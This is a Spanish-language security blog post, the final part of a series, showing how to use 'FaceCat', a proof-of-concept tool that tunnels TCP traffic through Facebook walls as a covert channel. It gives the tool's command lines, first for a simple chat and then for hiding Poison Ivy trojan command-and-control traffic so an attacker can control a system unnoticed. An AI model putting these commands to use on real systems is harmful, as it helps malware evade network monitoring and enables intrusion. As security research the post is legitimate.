¡Y por fin llegamos al último post de la serie! Ya tenemos el FaceCat programado (aunque os recuerdo que es fácil que algo haya cambiado y en estos momentos necesite modificaciones) y podemos usarlo para establecer canales encubiertos a traves de FaceBook:
$ ./facecat.py
Usage: facecat.py [options]
Options:
-h, --help show this help message
-w WALL, --wall=WALL wall pipe account
-c HOST, --host=HOST connection host
-p PORT, --port=PORT listening or connection port
-v, --verbose verbose output
El ejemplo más típico, porque es el que menos problemas puede dar, es hacer un simple chat TCP, que podemos hacer de la siguiente manera:
$ ./facecat.py –v –m wall1@gmail.com –p 4444
Luego utilizamos un par de putty's o NetCats para conectar a los puertos a la escucha, y a ver si conseguimos establecer una comunicación.
¡Perfecto! Parece que la cosa marcha. Ahora el siguiente paso es intentar hacerlo con una comunicación de un troyano convencional. En este caso hemos usado Poison Ivy, para ver si podíamos emplear toda su funcionalidad a través de un canal encubierto.
Para ello crearemos el malware de Poison Ivy con su generador, diciéndole que conecte a 127.0.0.1 al puerto 3460, donde tendremos escuchando un FaceCat que encapsulará la comunicación a través de FaceBook:
> facecat.py –v –m wall1@gmail.com –p 3460
En el lado del C&C, tendremos otro FaceCat que recibirá la comunicación de FaceBook y conectará al C&C del Poison Ivy para transmitirle la información ya desencapsulada:
> facecat.py –v –m wall1@gmail.com –c 127.0.0.1 –p 3460
Con todo eso, y el propio Poison Ivy, podemos ver como tomamos el control de un sistema empleando tráfico completamente encapsulado a través de FaceBook:
Por supuesto, el uso de canales encubiertos no es gratuito, y los que habéis usado el Poison Ivy con anterioridad habréis observado que funciona más lento de lo habitual, especialmente al realizar la captura de pantalla, pero es el precio que se tiene que pagar por la "invisibilidad".
El código fuente está disponible AQUÍ, pero como ya os he comentado, esta investigación fue realizada hace tiempo, por lo que es probable que necesitéis hacer cambios para que consigais que funcione.
2 comentarios :
Muy interesante, se puede modificar ? o tiene algun tipo de licencia?
El código yo no lo voy a mantener a no ser que necesite volverlo a utilizar. Simplemente es una prueba de concepto.
Si lo actualizas dímelo y lo subo, te ponemos en los créditos como "actualizado por:" y ya está.
Si lo vas a modificar mucho o te comprometes a mantenerlo, simplemente mantén el crédito de "código original de Jose Selvi" y ya está.
Vamos, aplicad el sentido común. Por lo demás podéis usarlo como queráis.
Publicar un comentario